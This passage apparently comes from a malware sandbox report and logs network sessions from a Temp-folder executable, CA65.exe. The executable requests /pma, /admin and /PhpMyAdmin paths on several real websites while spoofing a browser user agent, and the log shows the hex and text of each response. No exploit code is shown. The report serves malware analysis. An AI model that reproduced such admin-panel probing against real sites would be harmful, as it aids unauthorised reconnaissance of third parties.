2023-12-22 20:15:08 UTC	1262	IN	Data Raw: 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 5f 6b 65 79 27 2c 20 65 73 63 61 70 65 28 27 61 62 36 33 34 33 39 62 33 32 62 30 61 31 65 38 34 34 65 35 61 62 36 64 36 66 34 65 32 35 35 39 30 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 77 6f 72 64 70 72 65 73 73 5f 61 70 62 63 74 5f 61 6e 74 69 62 6f 74 27 2c 20 65 73 63 61 70 65 28 27 34 31 36 62 31 38 63 66 62 62 34 66 32 33 61 33 34 32 30 35 37 66 33 66 35 37 31 61 30 33 32 31 33 36 33 38 34 33 31 61 34 39 31 34 65 31 62 37 63 61 64 63 64 37 38 63 31 61 32 63 62 36 63 36 27 29 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 72 69 6e 67 28 29 5d 2c 0a 09 09 09 09 5b 27 63 74 5f 73 66 77 5f 70 61 73 73 65 64 27 2c 20 27 31 27 2c 20 64 61 74 65 2e 74 6f 55 54 43 53 74 Data Ascii: ['ct_sfw_pass_key', escape('ab63439b32b0a1e844e5ab6d6f4e25590'), date.toUTCString()],['wordpress_apbct_antibot', escape('416b18cfbb4f23a342057f3f571a03213638431a4914e1b7cadcd78c1a2cb6c6'), date.toUTCString()],['ct_sfw_passed', '1', date.toUTCSt
2023-12-22 20:15:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
252	192.168.2.4	51467	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	260	OUT	GET /pma/ HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:15:07 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:07 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag() { dataLayer.push(arguments);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
253	192.168.2.4	51519	34.206.39.153	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	204	OUT	GET /admin HTTP/1.1 Host: aldine.org.com Accept: / Accept-Encoding: deflate, gzip Cookie: SERVERID=vpc3\|ZYXxJ\|ZYXxJ User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:07 UTC	582	IN	HTTP/1.1 302 Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin Location: https://aldine.org.com/admin/login Cache-Control: no-cache X-Request-Id: e36147d2-cedb-40c7-b613-0bee2c2cfa30 X-Runtime: 0.010182 Set-Cookie: SERVERID=vpc3\|ZYXxK\|ZYXxJ; path=/
2023-12-22 20:15:07 UTC	111	IN	Data Raw: 36 34 0d 0a 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 64 69 6e 65 2e 6f 72 67 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 6c 6f 67 69 6e 22 3e 72 65 64 69 72 65 63 74 65 64 3c 2f 61 3e 2e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 64<html><body>You are being <a href="https://aldine.org.com/admin/login">redirected</a>.</body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
254	192.168.2.4	51566	50.31.65.5	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	177	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: saltdelcolom.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	535	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/7.3.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://saltdelcolom.com/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 22 Dec 2023 20:15:08 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2023-12-22 20:15:09 UTC	833	IN	Data Raw: 65 32 39 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 26 23 38 32 31 37 3b 68 61 20 74 72 6f 62 61 74 20 6c 61 20 70 c3 a0 67 69 6e 61 20 26 23 38 32 31 31 3b 20 53 61 6c 74 20 64 65 Data Ascii: e29c<!DOCTYPE html><html lang="ca"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No s’ha trobat la pgina – Salt de
2023-12-22 20:15:09 UTC	14994	IN	Data Raw: 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 32 2e 33 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 6f 2c 69 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 70 3d 69 2e Data Ascii: /images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/saltdelcolom.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2.3"}};/! This file is auto-generated /!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 35 38 29 3b 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 35 37 31 34 32 38 35 37 31 34 32 38 36 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 31 70 78 3b 7d 62 6f 64 79 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 75 74 74 6f 6e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 69 7a 65 Data Ascii: ,.elementor-button-wrapper .elementor-button:visited{color:rgba(0,0,0,0.58);}.elementor-button-wrapper .elementor-button{font-weight:600;font-size:12px;font-size:0.85714285714286rem;line-height:1em;letter-spacing:1px;}body .elementor-button.elementor-size
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 31 29 3b 7d 3a 72 6f 6f 74 20 2e 68 61 73 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f Data Ascii: global-color-0-color{color:var(--ast-global-color-0);}:root .wp-block-button .has-ast-global-color-0-background-color{background-color:var(--ast-global-color-0);}:root .has-ast-global-color-1-color{color:var(--ast-global-color-1);}:root .has-ast-global-co
2023-12-22 20:15:09 UTC	9425	IN	Data Raw: 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d Data Ascii: ft;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 64 33 33 31 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 70 61 67 6f 2d 72 65 64 73 79 73 2d 67 72 61 66 72 65 61 6b 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6c 74 64 65 6c 63 6f 6c 6f 6d 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 70 61 67 6f 2d 72 65 64 73 79 73 2d 74 70 76 2d 67 72 61 66 72 65 61 6b 2f 70 75 62 6c 69 63 2f 63 73 73 2f 70 61 67 6f 2d 72 65 64 73 79 73 2d 67 72 61 66 72 65 61 6b 2d 70 75 62 6c 69 63 2e 63 73 73 3f 76 65 72 3d 31 2e 30 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 69 67 68 74 63 61 73 65 2e 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 Data Ascii: d331<link rel='stylesheet' id='pago-redsys-grafreak-css' href='https://saltdelcolom.com/wp-content/plugins/pago-redsys-tpv-grafreak/public/css/pago-redsys-grafreak-public.css?ver=1.0.0' media='all' /><link rel='stylesheet' id='lightcase.css-css' href='
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 62 75 74 74 6f 6e 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 74 61 62 6c 65 2e 63 61 72 74 20 74 64 2e 61 63 74 69 6f 6e 73 20 2e 63 6f 75 70 6f 6e 20 2e 62 75 74 74 6f 6e 7b 66 6c 65 78 3a 31 3b 7d 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 20 6c 69 20 61 2c 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 65 20 23 63 6f 6e 74 65 6e 74 20 64 69 76 2e 70 72 6f 64 75 63 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 74 61 62 73 20 75 6c 2e 74 61 62 73 20 6c 69 20 61 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 7d 2e 77 6f 6f 63 6f 6d 6d Data Ascii: tions .coupon .button, .woocommerce-page #content table.cart td.actions .coupon .button{flex:1;}.woocommerce #content div.product .woocommerce-tabs ul.tabs li a, .woocommerce-page #content div.product .woocommerce-tabs ul.tabs li a{display:block;}.woocomm
2023-12-22 20:15:09 UTC	16384	IN	Data Raw: 0d 0a 3c 61 0d 0a 09 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6c 69 6e 6b 20 73 63 72 65 65 6e 2d 72 65 61 64 65 72 2d 74 65 78 74 22 0d 0a 09 68 72 65 66 3d 22 23 63 6f 6e 74 65 6e 74 22 0d 0a 09 72 6f 6c 65 3d 22 6c 69 6e 6b 22 0d 0a 09 74 69 74 6c 65 3d 22 56 c3 a9 73 20 61 6c 20 63 6f 6e 74 69 6e 67 75 74 22 3e 0d 0a 09 09 56 c3 a9 73 20 61 6c 20 63 6f 6e 74 69 6e 67 75 74 3c 2f 61 3e 0d 0a 0d 0a 3c 64 69 76 0d 0a 63 6c 61 73 73 3d 22 68 66 65 65 64 20 73 69 74 65 22 20 69 64 3d 22 70 61 67 65 22 3e 0d 0a 09 09 09 3c 68 65 61 64 65 72 0d 0a 09 09 63 6c 61 73 73 3d 22 73 69 74 65 2d 68 65 61 64 65 72 20 61 73 74 2d 70 72 69 6d 61 72 79 2d 73 75 62 6d 65 6e 75 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 20 68 65 61 64 65 72 2d 6d 61 69 6e 2d 6c 61 79 6f 75 Data Ascii: <aclass="skip-link screen-reader-text"href="#content"role="link"title="Vs al contingut">Vs al contingut</a><divclass="hfeed site" id="page"><headerclass="site-header ast-primary-submenu-animation-fade header-main-layou
2023-12-22 20:15:09 UTC	4926	IN	Data Raw: 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6f 72 65 2d 62 6c 6f 63 6b 2d 73 75 70 70 6f 72 74 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 63 6f 6e 74 61 69 6e 65 72 2d 32 2e 77 70 2d 63 6f 6e 74 61 69 6e 65 72 2d 32 7b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 6a 73 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 76 61 72 20 61 73 74 72 61 20 3d 20 7b 22 62 72 65 61 6b 5f 70 6f 69 6e 74 22 3a 22 31 31 30 33 22 2c 22 69 73 52 74 6c 22 3a 22 22 2c 22 69 73 5f 73 63 72 6f 6c 6c 5f 74 6f 5f 69 64 22 3a 22 22 2c 22 69 73 5f 73 63 72 6f 6c 6c 5f 74 6f 5f 74 6f 70 22 3a 22 22 2c 22 69 73 5f 68 65 61 64 65 72 5f 66 6f 6f 74 65 72 Data Ascii: </style><style id='core-block-supports-inline-css'>.wp-container-2.wp-container-2{flex-wrap:nowrap;}</style><script id='astra-theme-js-js-extra'>var astra = {"break_point":"1103","isRtl":"","is_scroll_to_id":"","is_scroll_to_top":"","is_header_footer

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
255	192.168.2.4	51828	34.149.87.45	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	177	OUT	GET /pma HTTP/1.1 Host: www.valentinegrowers.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	1085	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=3600 X-Wix-Request-Id: 1703276108.0391710967552118108 Age: 0 Cache-Control: no-cache Server: Pepyaka/1.19.10 X-Content-Type-Options: nosniff Accept-Ranges: bytes Date: Fri, 22 Dec 2023 20:15:08 GMT X-Served-By: cache-dfw-kdfw8210064-DFW X-Cache: MISS Vary: Accept-Encoding Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLl77sBeKLtHVaXbFQUDNQYPu/2EjeiyKjB/JVOb8T5Ve,2d58ifebGbosy5xc+FRaliLS65Gchd7liiJBMWem/INlXLezy9ToUd017cVYlCANhcwCyQrKJIG5Qj+FSBkgbQ==,2UNV7KOq4oGjA5+PKsX47JzIq9ZmP05BQuFbD4KFyTFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,yRDaoXC/28ywKHhtXtgYjDFl/6Qyk2dCxDV7WouodNs=,WDMzHiyOL7uW518fW2ByrxD4X4GGeFX8Xll+nL3Pc+E4qaYh8SZeolIa32w52W7D4AMi8pzlO6fsIL/n0plsbA== Transfer-Encoding: chunked Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:15:08 UTC	167	IN	Data Raw: 62 37 31 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 Data Ascii: b71 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-sca
2023-12-22 20:15:08 UTC	1252	IN	Data Raw: 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c Data Ascii: le=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' \| translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <
2023-12-22 20:15:08 UTC	1252	IN	Data Raw: 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e Data Ascii: ices/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.
2023-12-22 20:15:08 UTC	270	IN	Data Raw: 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a Data Ascii: red</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
256	192.168.2.4	51525	52.165.155.237	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	261	OUT	GET /admin HTTP/1.1 Host: intermountainmls.com Accept: / Accept-Encoding: deflate, gzip Cookie: ARRAffinity=e58669f2f6f17ce103d8e9b9200a7d9dfa152360fc1de04faaf194b4173e8831 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	162	IN	HTTP/1.1 200 OK Content-Length: 2174 Connection: close Content-Type: text/html Date: Fri, 22 Dec 2023 20:15:07 GMT Server: Kestrel X-Powered-By: ASP.NET
2023-12-22 20:15:08 UTC	2174	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 42 4d 42 58 58 44 4a 59 31 48 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 20 7b 20 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b Data Ascii: <!DOCTYPE html><html lang="en"><head> <script async src="https://www.googletagmanager.com/gtag/js?id=G-BMBXXDJY1H"></script> <script> 